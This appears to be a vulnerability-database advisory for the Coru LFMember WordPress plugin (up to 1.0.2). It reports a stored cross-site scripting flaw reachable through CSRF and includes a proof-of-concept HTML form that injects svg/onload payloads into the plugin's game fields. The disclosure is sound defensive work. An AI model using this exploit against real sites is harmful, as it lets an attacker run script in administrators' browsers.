Lucene search

K
wpexploitWpvulndbWPEX-ID:DDAFCAB2-B5DB-4839-8AE1-188383F4250D
HistoryApr 26, 2022 - 12:00 a.m.

Coru LFMember <= 1.0.2 - Stored Cross-Site Scripting via CSRF

2022-04-2600:00:00
wpvulndb
50

The plugin does not have CSRF check in place when adding a new game, and is lacking sanitisation as well as escaping in their settings, allowing attacker to make a logged in admin add an arbitrary game with XSS payloads

<html>
  <body>
    <form action="http://wp.lab/wordpress/wp-admin/admin.php?page=coru_lfmember_admin&action=new" method="POST">
      <input type="hidden" name="game_id" value="" />
      <input type="hidden" name="game_image" value='"><svg/onload=alert(/XSS-Img/)>' />
      <input type="hidden" name="game_name_short" value='"><svg/onload=alert(/XSS-Short/)>' />
      <input type="hidden" name="game_name_long" value='"><svg/onload=alert(/XSS-Long/)>' />
      <input type="hidden" name="game_description" value="</textarea><svg/onload=alert(/XSS-desc/)>" />
      <input type="hidden" name="game_link" value='"><svg/onload=alert(/XSS-Link/)>' />
      <input type="hidden" name="game_enabled" value="0" />
      <input type="hidden" name="doaction_active" value="Apply" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Related for WPEX-ID:DDAFCAB2-B5DB-4839-8AE1-188383F4250D